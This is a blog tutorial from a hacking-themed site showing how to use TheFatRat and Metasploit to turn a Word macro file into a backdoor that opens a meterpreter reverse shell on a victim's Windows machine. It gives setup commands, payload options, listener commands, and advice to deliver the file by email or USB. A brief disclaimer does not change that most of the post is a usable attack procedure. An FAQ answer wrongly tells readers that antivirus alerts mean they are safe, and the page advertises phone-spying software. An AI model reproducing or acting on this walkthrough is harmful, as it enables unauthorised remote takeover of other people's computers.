• Write for Us
  • Courses
  • Blog
  • About Us
  • Contact
Hacker Academy
  • Write for Us
  • Courses
  • Blog
  • About Us
  • Contact

    Windows

    • Home
    • Windows
    • How To exploit Windows Systems with FATRAT & a .doc file

    How To exploit Windows Systems with FATRAT & a .doc file

    • Posted by shubham
    • Categories Windows
    • Tags doc macro, fatrat, hack windows, hacking windows 10, ms office exploit, windows hacks
    hacking windows with fatrat

    Microsoft Office is by far the most used office tool for creating and editing .doc files. But is it as secure as everyone thinks or Can hackers hack and exploit Windows 10 with Microsoft Word (.doc file)?

    I mean what can an innocent-looking .doc file do to exploit your system. Turns out quite a lot. This tutorial will show you how a malicious .doc file and a Windows system compromise give shell access to attackers on the internet.

    Note: I have tested this exploit on office 2007, and it works perfectly. Higher versions not so much. The latest versions are safe from this exploit.

    Table of contents

    • What is FATRAT Hacking tool?
    • Hacking Windows with FATRAT and MS Office Exploit
      • Step 1: Open Kali terminal and clone FATRAT tool from Github
      • Step 2: Setup and give root and execution permissions
      • Step 3: Install FATRAT tool
    • CREATING MIRCOSOFT WORD EXPLOIT TO HACK WINDOWS
      • Step 5: Metasploit setup
    • Step 6: Exploit the target with the backdoor
    • How to hack a window 10 with a .doc file
      • Step 1: Startup fatrat
      • Step 2: Enter the required details to set up the target
      • Step 3: Metasploit setup
      • Step 4: Exploit the victim
      • Commonly asked questions about hacking windows with Word files:

    What is FATRAT Hacking tool?

    FATRAT is a remote administration framework used to make rat applications and rat apk files with reverse shells that can be used for controlling devices remotely. By using FATRAT, we can hack any of the most used operating systems like Windows, iOS, Android, and Mac. Today we will hack windows 10. So let’s hack windows with Microsoft office.

    Hacking Windows with FATRAT and MS Office Exploit

    Disclaimer:

    Please be aware that exploiting or testing any device is illegal unless you have permission from the owner and the parties involved. This post should be used as a tool to help people understand how hackers can exploit windows 10 devices with .doc files and tools such as FATRAT. We shall not be held responsible if any criminal charges are brought against any person who misuses the information on this website to violate the law.

    So let’s learn the steps to hack windows 10 with word files. So let’s start hacking.

    Step 1: Open Kali terminal and clone FATRAT tool from Github

    Git clone the following FATRAT repository from the Kali Linux terminal and run the following commands to setup FATRAT:

    For cloning fatrat type

    git clone https://github.com/Screetsec/TheFatRat.git

    Then type cd TheFatRat

    Step 2: Setup and give root and execution permissions

    Give the FATRAT folder and the hacking script root permissions to compile and execute in Kali Linux. Use the following command:

    fatrat hacking

    chmod +x setup.sh

    Step 3: Install FATRAT tool

    Use the following command to start the installation of FATRAT in Kali Linux.

    ./setup.sh

    Once fatrat is installed, you will see the following screen

    Type y for yes so that you can run fatrat from any terminal.

    CREATING MIRCOSOFT WORD EXPLOIT TO HACK WINDOWS

    We will create a backdoor for the office using Microsoft. To select this windows backdoor hack

    Type 7

    the fatrat

    Now we will create a backdoor with a word file and hack windows 10

    Type 2         

    hack windows

    Now that you have chosen the exploit to use for the backdoor.

    You have to give the necessary options and information for hacking windows 10

    fatrat hacking windows

    Enter LHOST listener/attacker IP address.

    Type 192.168.1.12

    Type port 4444 or any port number.

    Enter backdoor file name testing file

    Type 3 for using windows/meterpreter/reverse_tcp exploit.

    Press enter to create a backdoor with the specified exploit.

    After backdoor file is created, it will be saved in /home/user/Downloads/TheFatRat/output/testingfile.docm

    hack windows

    You can send the backdoor file over mail or sending it via a USB drive might work as well.

    Step 5: Metasploit setup

    Startup a terminal and type the following command to start Metasploit.

    # msfconsole

    Now in the Metasploit console type the following commands

    hacking windows with fatrat

    Use the below commands

    msf > use exploit/multi/handler

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

    msf exploit(handler) > set lhost 192.168.182.136

    msf exploit(handler) > set lport 4444

    msf exploit(handler) > exploit

    Note:

    **lhost= YOUR IP address

    **lport= 4444

    Step 6: Exploit the target with the backdoor

    Once the target clicks on the word file, the backdoor script will execute, and the meterpreter session will be opened in msfconsole, as shown below.

    windows 10 hacking

    The above victim is using Windows 10 system with office 2007 installed.

    Type the “help” or “?” command to see all the possible options you can use on Metasploit for hacking windows systems.

    Still not satisfied? Let’s do one more with a slight twist.

    How to hack a window 10 with a .doc file

    Step 1: Startup fatrat

    hacking windows

    Here, we will create a backdoor using PHP. Type 1

    Create backdoor with msfvenom

    Then type 12

    windows fatrat hack

    FATRAT.PHP BACKDOOR

    Step 2: Enter the required details to set up the target

    Enter

    LAST 192.168.182.136

    Then enter

    port 4444

    Type file name as textfile

    hacking windows with fatrat

    As shown, the backdoor for hacking windows with doc files will be created.

    Step 3: Metasploit setup

    Open up a Linux terminal and type the following command to start Metasploit.

    # msfconsole

    Now in the Msfconsole enter the commands:

    MSF > use exploit/multi/handler

    MSF exploit(handler) > set payload windows/meterpreter/reverse_tcp

    msf exploit(handler) > set lhost 192.168.182.136

    msf exploit(handler) > set lport 4444

    msf exploit(handler) > exploit

    Step 4: Exploit the victim

    As the target victim opens the malicious doc file. The windows system will be hacked, and we will get a shell terminal with access to control the target system.

    You will get a meterpreter shell on the Kali Linux terminal as shown below.

    hacking windows with fatrat

    You have now successfully exploited and hacked a WINDOWS 10 device using a word file.

    Type the “help” command to show all the possible options for exploitation.

    e.g. getsystem command can get you admin access.

    So, this is how hackers can exploit windows with Microsoft word & the FATRAT tool.

    Commonly asked questions about hacking windows with Word files:

    Q1 Is hacking windows devices legal?

    No, hack windows devices is not legal. We do not support hacking or exploiting devices. This post is just to show how hackers can exploit windows 10 systems and devices by using word files.

    Q2 The word files I made are detected as a virus by antivirus. Am I safe?

    Do not worry, you are safe. The alert is because you made your own virus, which is hidden in the word file. The antivirus software might detect the virus. Which only means you have a great antivirus. Cheers, and be glad.

    Q3. How can I hack my friends/Spouses pc with this hack?

    This hack is only for educational purposes, not for hacking people. We do not support any illegal hacking. Kindly refrain from such comments and requests. This tutorial is for educational purposes only.

    Q4. Does it work on higher versions of Microsoft Word?

    It works on some versions of Microsoft 2010. But after that, Microsoft has long since patched this exploit. So you are probably safe as long as you stay updated to the latest version.

    Cocospy Phone Spy

    Tag:doc macro, fatrat, hack windows, hacking windows 10, ms office exploit, windows hacks

    • Share:
    author avatar
    shubham

    Previous post

    How to Hack Facebook with Shadowave
    February 15, 2021

    Next post

    ZANTI Review - The Mobile Pentesting Toolkit
    February 15, 2021

    You may also like

    top 10 skills every hackers must learn
    Top 10 Skills Every Hacker Must Learn
    8 August, 2021
    pexels-markus-spiske-1921326
    Top 10 Programming Languages for Hacking
    26 June, 2021
    pexels-sora-shimazaki-5926382
    Top 10 Hacking Movies of All Time
    26 June, 2021

    Leave A Reply Cancel reply

    Your email address will not be published. Required fields are marked *

    Cocospy Phone Spy
    Cocospy Phone Spy

    Suggested Tools

    [email protected]
    Facebook Twitter Google-plus Pinterest

    Company

    • About Us
    • Contact
    • Write a Guest Post

    Links

    • Privacy
    • Terms

    Support

    • Disclaimer
    • Advertise With Us
    • FAQs

    All rights Reserved 2021 || For any issues contact: [email protected]

    • Privacy
    • Terms